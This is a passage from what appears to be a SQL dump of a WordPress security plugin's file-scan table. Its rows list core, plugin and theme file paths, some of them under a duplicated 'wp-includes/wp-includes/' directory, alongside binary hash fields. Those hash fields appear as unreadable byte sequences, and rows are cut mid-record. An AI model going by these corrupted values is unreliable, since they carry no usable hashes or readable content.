\'c���2�G���5y�','��2��:`���@Aqr\Z�\r�?�,��񵟞�','',0,'?'),('Uu�{c�\r��\n|��','wp-content/plugins/insert-headers-and-footers/views/dashboard-notices.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i����@=�1���*','�S�x|�ʎFD���P��t����QI��±�I','',0,'?'),('Ux��\'k�jqU�>)A','wp-content/plugins/wp-smushit/core/integrations/s3/class-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oy�b�nV��㘡(�7','u9�j�`�2��xВUZ*�Z���?2�H^;','',0,'?'),('U�.��G\0��h7K','wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{��Dz��겊��T','s�׷my(�[�~��M������N�Ԙ��;i','',0,'?'),('U� $A=�He�|�zȖ(','wp-includes/Requests/SSL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��SUa �o�����','�&�K��ps֍y�\Z�@?7G��c��#EU�','',0,'?'),('U�×H� m�H/�','wp-content/plugins/wordpress-seo/js/dist/languages/fr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]�H����s��`\Z?','~��y��	� ���1hK1���%W�$��Ɩ�','',0,'?'),('U�@���dO�a�Եv.<','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php',0,'Э�bJ������\r%','Э�bJ������\r%','�*��>}6��?j-9�N�AJ|�r���w�d�','',0,'?'),('U��(��4�,yr��Ԭ','wp-content/plugins/wordpress-seo/admin/class-helpscout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�܎�lj�9~X','�t5���F��A����)>�\\��Hɝ�C�,/1Ӛ','',0,'?'),('U���u��Jmo��j���','wp-content/plugins/wp-smushit/app/pages/class-bulk.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���p�Δ���m)�','*P�w{^۫�O���9أ�r/��P!���4.�','',0,'?'),('U�nɓb4lZ,I','wp-admin/css/about-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-hݱ���O�','!�B�)6�\\�g0�$��/a�ΐn�kG','',0,'?'),('U�Q�1{�4�/�g��','wp-includes/wp-includes/js/dist/escape-html.min.js',0,'1���~9�(��-{�','1���~9�(��-{�','G�U_�N_xC�`ѳf)�r����s��\Z�\n','',0,'?'),('U�~�UO:c#3#W��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-configure-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�OF�����}˻�L','��3t��������u�:�\\C��B]�v�DE��','',0,'?'),('U�y>��k@�(<LK�','wp-includes/wp-includes/sodium_compat/src/Core/Util.php',0,'��w.�n��7��I���','��w.�n��7��I���','����W��.�3$��^�O�:7za��0A�','',0,'?'),('U���$i\"u��&��9','wp-includes/images/crystal/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l��ڤ�;�=','��S\rI��U��9_<�f`��&HYw�u�','',0,'?'),('U�*�7G�gn5��i���','wp-content/themes/hitmag/inc/kirki/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{\'w�4����T�U�/�','k�H����_��:�j����/��8O�Y�h�','',0,'?'),('V\n�KOZ�7�!J�O��','wp-includes/css/dist/block-library/editor-elements-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�vHօ�<��Uj+�@T','����VLb����4d�op���w���X�K��','',0,'?'),('V\n��U`�_�5���8','wp-includes/js/customize-base.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��HV���Ô\rc)��%','Bοn�Y?C)3RYb����Ř�3dBv�b�3','',0,'?'),('V��<�7G�n���','wp-includes/blocks/separator/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��FH�̬0��K�','�N�ԉ�Q�Y�w��O۫��xm�8T��{�','',0,'?'),('V�\r�3#��J��{','wp-includes/sodium_compat/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�7�{(G5��','5<��H���X0���t�>�-�������','',0,'?'),('V#7A�����@�?���)','wp-content/plugins/wordfence/views/unsupported-php/admin-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(`��HMD��A�7�9','y��I~	@V�Y247�&�U��uމ����','',0,'?'),('V2�L��\0ۺ��','wp-includes/js/jquery/ui/controlgroup.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�Fo`N�E+�','�	�J��B�|^!�ss�o5�H�LR��t�','',0,'?'),('V<�_k3&�PC^ı��','wp-includes/wp-includes/js/tinymce/plugins/wpview/plugin.js',0,'�j5q��S\rX���i��','�j5q��S\rX���i��','Ej\Z��\Z�I���3J��G�jVݒ��6<S�9P','',0,'?'),('V?�O�N���e�ZF\\�','wp-includes/js/jquery/ui/accordion.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m��v����w�2�','�w1O߾0�V��I��$W���=����m����','',0,'?'),('VFo�o�ۂ�C*�}+','wp-content/plugins/wp-fastest-cache/templates/htaccess.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�Iq���c\0o�','�R�7S�@͓�@]��Ѿ)(��h֠��/%)�','',0,'?'),('VL6�7G^l%D5z3��','wp-includes/default-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�B z\\f\0�����','%�rN8*G#��C��UᴭP�z�p_-���\n֌','',0,'?'),('VUͳD�@(!)2��','wp-includes/wp-includes/js/media-views.js',0,'t	���V\\E�P�[�','t	���V\\E�P�[�','��,���C �A�ERo=4=^��������|','',0,'?'),('VW�;z��*���(���','wp-includes/blocks/navigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��ކԯ�)Pa����','��EJ^=`��)�������ʝ�fv�����','',0,'?'),('Vi\'��Ru�h:���u�','wp-includes/blocks/query-pagination-previous.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�ne��/���','\r��S�&$[��\\~�����\"Hɛn���','',0,'?'),('Vne!�z0u1?��','wp-includes/shortcodes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����8��~�y!','ԕ��<�����?�ll��Sb3��Yo����','',0,'?'),('Vrm�KE�p�j��6�','wp-admin/images/w-logo-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[N�W��_p�w�0','ޣ^Q�t�3�H�unU❻��~�\'�T2','',0,'?'),('V���Dp�6@��%\\','wp-content/plugins/wordfence/css/license/care-global.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�kK�.�Ǵ�U��^','2�Ʋ�v{\"S��=��^!��W:C,OJ�e:�9','',0,'?'),('V�����댏$�x','wp-admin/js/post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���p�D|ؤm��ʧ�','�zt��G-�(�11�&2�C5�U��k�/�bG�','',0,'?'),('V�!�U9�D��`�}�','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-message/src/RequestInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���G}�6l-Tlk��','+�ʡ��t�^E��M��l5�?z��k�:�*�','',0,'?'),('V����rz�(�nol*','wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)��S4�C@�r\0\\Z','\0�n�b�ǻ���I꾊N�܂��Ӡ�fR�z�','',0,'?'),('V�rW��+�v��ӎ','wp-includes/wp-includes/js/utils.min.js',0,'t��0�`ߣ���MVi`','t��0�`ߣ���MVi`','�js�@Vna�v�t\'ȀD��,݆���T;','',0,'?'),('V�p�Eh�\r�:��s�#�','wp-content/themes/hitmag/inc/kirki/modules/tooltips/tooltip.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%S=�w�X	��o-�\\�','�{9��CZOq��x����V�UP�~��-~','',0,'?'),('V׀��\'h��Ĉ+:��','wp-admin/includes/network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(4�[��ǎ�.�ȭN','X[��-����@��l��n��ނs�����','',0,'?'),('V�C\n�W���<&od+�','wp-content/plugins/redirection/models/group.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	:�C\02�;Eշ�\r ','��V5�\",7�Sp�9q�A�$��P1�P�0��','',0,'?'),('V���1)�~����O','wp-content/plugins/wp-cerber/assets/wrench.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�3�Cb�C-2!�Q�','�;�����մ��xj�E����%Z�P�c��','',0,'?'),('V��,�|� �Ojg��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/pl.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��F��:�w�^R','���Ȥ]0f��S����;���@%NR�IayW','',0,'?'),('W�)qXh���q','wp-content/plugins/wordpress-seo/css/dist/alerts-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����ݽVZ\'��T','35�g���v��FP6��S�t�P�Zl�9@݆','',0,'?'),('Ws�$8�~��Nȁ-�@','wp-includes/js/mediaelement/mediaelementplayer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�ĪL��5��!\n�','o��^:v\\���m���o����cTW[���k','',0,'?'),('W�Q���4�@�ܯ�7','wp-includes/wp-includes/sodium_compat/namespaced/Crypto.php',0,'�G8�J+��	��z','�G8�J+��	��z','>8���\'X�i�Ub�Gн�,<T`6��4Ѝ�','',0,'?'),('W��WO���>��mA','wp-content/plugins/wordpress-seo/src/presenters/open-graph/title-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"�L���{1/ʔ��','�u\"�\nf\Z(\"����m�m�K?���&K�x','',0,'?'),('W>fg>��:{��<&','wp-content/plugins/wordpress-seo/src/services/health-check/postname-permalink-check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qX�\'��Ҏ�����2y�','�;��az��a�\"v[a>%ܛjCZw�F��t','',0,'?'),('W&�ִ �)+�ڱ���','wp-admin/includes/class-plugin-installer-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��#r봠���^�n�I','Ɠ�l���$�6b�OÚ�����%O3�\\pc','',0,'?'),('W8h�!ɩk�ĉ\'�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�RU�b�*��\0\'�','x����<�s��BZ�2�j��RM\'0%$��i{ V','',0,'?'),('W;1C\\:~��D���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-logged-in-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5=��O-�E[�F��','){e���`�v�)?/��;wnh�x�r���%�','',0,'?'),('W<S�����/q�H�','wp-content/themes/hitmag/inc/kirki/modules/custom-sections/sections/class-kirki-sections-nested-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�0�c��?��4\"��','���l)���6�_\'�k�\r�bI{���\'S���tPS�','',0,'?'),('WZu�@���<��,q�','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/domhelper.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�/+6\r���r��','�Å	�74��b���9.�\Z;,�됃�\'M�)����','',0,'?'),('Wf��)xu��K����>','wp-content/plugins/wordpress-seo/src/config/migrations/20200513133401_ResetIndexableHierarchyTable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ø��r���娂.�/','\r�O�w��P����ս��m��G�	��\0�m\'','',0,'?'),('Wl[_��-�콞	�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-brute-force-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Dewu�lT�nU��t','Z�x2�X��56J�*T��9\"�aП�\Z_G;�7','',0,'?'),('Ws��{N�hP�r�㼱','wp-content/plugins/wordfence/lib/dashboard/widget_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��9�64\"�k��y','�X�������\"v����-*������3','',0,'?'),('Wx\Z�Ta��7{��','wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�|��s,�=�K#�','6���ly�6ɦi��3U���,�E[鲓9��','',0,'?'),('Wz��Ut�!\\.�E�\n�','wp-content/plugins/wp-smushit/_src/js/frontend/resize-detection.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IE��0-����F��i�H',')�h�m�0���Ѯ-�]H��V�s	#��϶�','',0,'?'),('W{�g- X��\'=n8','wp-admin/moderation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�EVU��u�������','��Fq�6��1����<���w�t&�b����1��','',0,'?'),('W})Ӗ7���e�}5�9,','wp-admin/load-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�;����<����\r1','�; ���{���(\'�L��#N����=vyy','',0,'?'),('W����DڰS��º�','wp-includes/wp-includes/js/mediaelement/mediaelementplayer.min.css',0,'�	��5�)��k�y�~','�	��5�)��k�y�~','_Dt�3ג�3p��a�;9,�\n�ig���C?3�','',0,'?'),('W��LjN/�@Ϣ�ư�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T	��nr�k���','�;\\��Xځ��/0;��Q�P�.�B4��\Z�','',0,'?'),('W��.���q͟t�ﮊ','wp-includes/wp-includes/css/dist/editor/editor-styles-rtl.min.css',0,'��?4��nT�#���','��?4��nT�#���','�D�ծ6��8g\n)e���z��l�1�MH��&','',0,'?'),('W���,D-�5[�v�f','wp-content/plugins/wp-smushit/app/modals/onboarding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��E?��P��Uk��	','t��$�����T=g\Z�\rY�O����w�w�%��','',0,'?'),('WĮ���(�4\n�ڤE','wp-content/plugins/wp-smushit/_src/react/modules/webp.jsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a��n�+�>m�����','kr4l�駼���j�����0j�<�>yR�_�\0','',0,'?'),('W�->�)c�����2�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('W��h��TD�H�d�h�','wp-includes/wp-includes/class-wp-http-cookie.php',0,'`=Y=��3���p*���','`=Y=��3���p*���','�n�<o��%�/�U\"y�\"���)�����B�','',0,'?'),('X}\Z�`�J]�`�n&�)','wp-includes/wp-includes/images/smilies/icon_neutral.gif',0,'��VM3HU1!�v','��VM3HU1!�v','���Ois8\0�|z��6�]e��@Y�m49','',0,'?'),('X\nelh�o(��wwRM��','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php',0,'��\n��|�bA~tb`*','��\n��|�bA~tb`*','�����}͒l>��-A�����T�$��]n','',0,'?'),('X��\\shv]�iB�','wp-content/plugins/wordfence/waf/wfWAFGeoIP2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','݇�(�0,m�G_Y�3','^�)o�B������f�g�*�V�P�?�~��u:','',0,'?'),('X(ܔ�H!�b,�','wp-content/plugins/wp-smushit/core/modules/async/class-async.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o����!��+\'�\'','���+�	$��B�d\\�#\'���F��q�p�M�','',0,'?'),('Xͮ���xⷙ�#��','wp-content/plugins/wordpress-seo/inc/class-wpseo-replace-vars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X6�HU61�k�9��','\Z�Z�����5�M�:��t\ZJ;��?x�^�','',0,'?'),('X���9܁�y̜','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/hy.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ѭ)�[�\'I�t��','W3Oǻe>�:d��3�\r�C�� �����Z�','',0,'?'),('X,�E�Cj$_��8I��0','wp-includes/images/smilies/icon_cool.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��`����ivj.�','�事F�9;2_	�$�$~�LO�a��6���_','',0,'?'),('XJ��\n�sp3t9!҈','wp-includes/style-engine/class-wp-style-engine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{��bR����Q��','aD\\?]����4�����EJ ���Iل�\rn�','',0,'?'),('XP�3�T6�\n�>��\Z','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/mk.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/�ǀv�oG{	4�\r{�','[�P��@\'rA�{��ž�#�P\"CG','',0,'?'),('Xg#�m\rf�j�7m�^','wp-includes/blocks/post-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���W��E|~St�','�o�c�8sש�+r�<�54�ف ���','',0,'?'),('Xn�[\r�M�YrLdR���','wp-content/plugins/wp-smushit/core/api/class-hub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�({���ܳ��7Y','�z�>�3k\nh���u���2Mso�w��{腓','',0,'?'),('X�۩�i)�9Y���','wp-content/plugins/redirection/actions/nothing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[�	�}Wُ ','��pí4ũ����[�{��������/��','',0,'?'),('X��M����xڳ�J�','wp-includes/Requests/Hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��AQ��U;:�BH��i','�՚���� Q�憐D�P��؂_?y�`�����','',0,'?'),('X�:8+˓2>V]��8�','wp-admin/images/sort-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Aìk�:�bтvFj','\'���aK�\0tGJ�Bq��XW*(J|1���z[(','',0,'?'),('X���v�\Zƒ��\"�$','wp-includes/Requests/Exception/HTTP/409.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|:���7�Ȳu�O','���_M��8U���.pF����w�:E`�MB��','',0,'?'),('X�2�FGr��m��F��','wp-includes/blocks/button/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����2(�@$9yX�','zk�W��FT��0����}E|�=��YwT�S','',0,'?'),('X�?M-H?���Al8/','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-acct-activity.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.\\������cŋ�K��X','/����$�����3\0��,�g��Kz6��G|','',0,'?'),('X���2GV�T�`','wp-content/themes/hitmag/languages/hitmag.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�i�!���fY����W','��&�S�/�Z�BӡD���f�,���,hQ��','',0,'?'),('X�s��Yq���ePL','wp-includes/blocks/code/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��NQ�P\'�}c��r�','�=Los��\\���F�� ��4#G>���!0E��','',0,'?'),('X�֏�|5_8Ep�A��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/BufferStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%I������','8Q��`+�V�$懶t0H����\'`������>�','',0,'?'),('X���G������z�X','wp-admin/includes/class-wp-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;h�x	��2ذU$�','���V3�]����`2����T$����,��ה','',0,'?'),('X�~�Vzl!_�]/�-3','wp-content/plugins/wordfence/models/firewall/wfFirewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X��C��#B�sT�b','×GH����5kӹr�ܰRR��_�x�-�','',0,'?'),('X�x�7iH*$���9','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�6[�n�9�W�4E3e\Z','��K�A�-�����o�#,��h��~SWc~;4t','',0,'?'),('X�k(D��qț��G��','wp-includes/js/jquery/ui/slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5s�����}�@N','`��W�CG��ZǍ�\0d$ejxYE�r���8','',0,'?'),('X��N��8�j����c�','wp-includes/blocks/post-excerpt/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�1�,ͯeܒ���','�W޻i���7�5�^gDn~Q�\"5Q Wɟ�','',0,'?'),('X�xhy�q}�np��B','wp-includes/wp-includes/sodium_compat/namespaced/Core/X25519.php',0,'ڸb��9����M','ڸb��9����M','�F�/\'���M%�9�}@��fW�>��S*�m','',0,'?'),('X�=�2h4�/{�+','wp-includes/spl-autoload-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��u�{�t���','��,�Z\rM	>܅��g�p�/�	Z\Z#`!�.','',0,'?'),('X��Fz��B�8���,','wp-includes/wp-includes/js/jquery/ui/effect-clip.min.js',0,'�G��=�����:�	s','�G��=�����:�	s','��tw�:��o,�u3Mxm���x�H ��gC��','',0,'?'),('X�TCW_^��og��','wp-admin/includes/class-wp-debug-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^D1����B.et�','f�?�r\r��RM����@��{�8�<��&5D\"��','',0,'?'),('Y����bڧ,��J','wp-includes/Requests/Exception/HTTP/405.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r)qOel����N��~','j�b�횄��^U�sv8�$b����M�3y�','',0,'?'),('Y�%\n��#�,��l.j�','wp-content/plugins/redirection/locale/redirection-gl_ES.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�-��Z�\r:Cv\Z','���2��%{�T�I��v3x��VU���a','',0,'?'),('Y(�K���g\0��_��','wp-includes/js/dist/annotations.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V*\n��yaK;��[�L�','����	 =�����j_}��;Є8i2OU\0u�%Jo','',0,'?'),('Y,Qp�gmu#�e���~','wp-includes/widgets/class-wp-nav-menu-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-���(\"v�V>�','N8�X��<ه��\\՘��1�vvF��7�','',0,'?'),('Y/�ޑ�	���\Z���','wp-includes/js/dist/escape-html.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)q�*.3�A','��NC��$\r�+q�c��b�\n�(h]�@�\ZA��','',0,'?'),('YBt\n�\nc�ݟ.��vi','wp-content/plugins/wordfence/views/diagnostics/text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n���W�hg��q�','�;�<c��6�|_�]�)�m����}pd���g	','',0,'?'),('YV�2��9}D8�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=on~Z���TOQ�Be','�<�H���\"��F�@����%���1`7<��	��}','',0,'?'),('Yd�{�2_y��}�$','wp-includes/wp-includes/js/tinymce/skins/wordpress/wp-content.css',0,'�����`��Un\0\r��','�����`��Un\0\r��','>���@�:so���X�=��Kd��ku�{�','',0,'?'),('Y�La���h�(','wp-admin/edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��\'����~%S�','�N��m$ٴ+r�+@��2��<�-Jl��ʚ�g','',0,'?'),('Y�,�e�A��w�`���','wp-includes/images/media/archive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����h�\0��ì�u','\0�Bb�3��\'��\'��)JG ��](G�9Pr2 s','',0,'?'),('Y�BWy	+�B�Om�z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��:��N�\'�Dx��N','�[��_|А�~E����+�~�E�(�`�_��','',0,'?'),('Y�68�H;%,�_c\n�','wp-includes/css/wp-auth-check.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j��b�u��=�`c','�\r[�B�{\'C�N5zZw� pȈ��I�K�e ��','',0,'?'),('Y�J+{�o(�A%f�e�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��#�(��?��','o�c��̺m�J �\nK�\"�Fו�Kc�E��','',0,'?'),('Y�&)_�����w�o�8�','wp-content/plugins/wordpress-seo/images/alert-success-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?h�0X���','�,�0\ZA/�Z�eK�O\\pң\ndF��\nef�i�','',0,'?'),('Y�r�҆�M}��\n\0�','wp-includes/wp-includes/js/tinymce/wp-tinymce.js',0,'����--��T�J�;','����--��T�J�;','��O���w�:�V�^�w�^[\n�	L�\'�6@-�\r�','',0,'?'),('Y���\'K`HP�Y�s','wp-content/plugins/wordpress-seo/src/config/migrations/20210817092415_AddVersionColumnToIndexables.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�HFjb�Uv��|�I�','�!�O�N�}#����쒦=���Ev݄�\0fTٶ�C','',0,'?'),('Y��8��NH��*f��G','wp-content/plugins/wp-cerber/assets/flags/et.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���h9�G\0����O�','�x��^)9[�-�&o��U��\0\Z�h�DŽ��.','',0,'?'),('Y�J��|��[D��y�Y','wp-content/plugins/wordfence/waf/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('Y����]���ŞI���','wp-includes/js/jquery/ui/effect-slide.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������������`','����{,o�ף��qI�l�z<HHrU�+o]M','',0,'?'),('Y֝��U����}�r/','wp-includes/SimplePie/Cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	��~ܯ{ʹ���+h�','�md�����n�nun�pU0 l��6���Zi�R','',0,'?'),('Y�J�K��1˺&�y�\"','wp-content/plugins/wp-smushit/_src/js/frontend/lazy-load-native.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`��L�ǓKu )2g','�#��:9�����}��貆�������apu�a','',0,'?'),('Y�UL�5J�ޔ�v[�','wp-includes/rest-api/search/class-wp-rest-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[�o��\0�%�Y��','&�#�k#�P�/Ɏ��J�LN�L��','',0,'?'),('Y�S�%3X�ȴ���T�','wp-content/plugins/redirection/locale/redirection-fr_CA.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�|��:�|�I','̇��K����nj0p-��/�~].�M�c�C�K�','',0,'?'),('Z�ұ�bi��.\Z��','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/GrantFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���x�*��^�l\r�n-','���$�=�Y#=Y�X�/2��o���s;Np','',0,'?'),('Z�Ko<��-23	�','wp-content/plugins/wp-smushit/app/views/integrations/meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��vмF֚��H�$�\\','�2B�$����/�+�zs��h-nj0�_�','',0,'?'),('Z���E 9En�����','wp-content/plugins/wp-smushit/core/modules/class-png2jpg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*��rl���I�m��y�','���B\nA2�`�4��K�x����Mj/z','',0,'?'),('ZL�܏�v�N�%�%_','wp-content/plugins/wordpress-seo/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','</h�QRL��$`���','٣K.y �\'1��T9?D�j���G3AZh�:','',0,'?'),('Z�Y�L��崤S+2','wp-includes/wp-includes/functions.wp-styles.php',0,'�GQ\0���[��� �9','�GQ\0���[��� �9','E�Z�H����Ruj�X{L��oy�X`	Y��鈨','',0,'?'),('Z\'��Xz�0�_�Ƚ�T','wp-includes/wp-includes/css/dist/edit-post/style-rtl.min.css',0,'��{J����3=�f�','��{J����3=�f�','w��ko����xv&Aޭ�� T�gޗ���','',0,'?'),('Z+��=�:��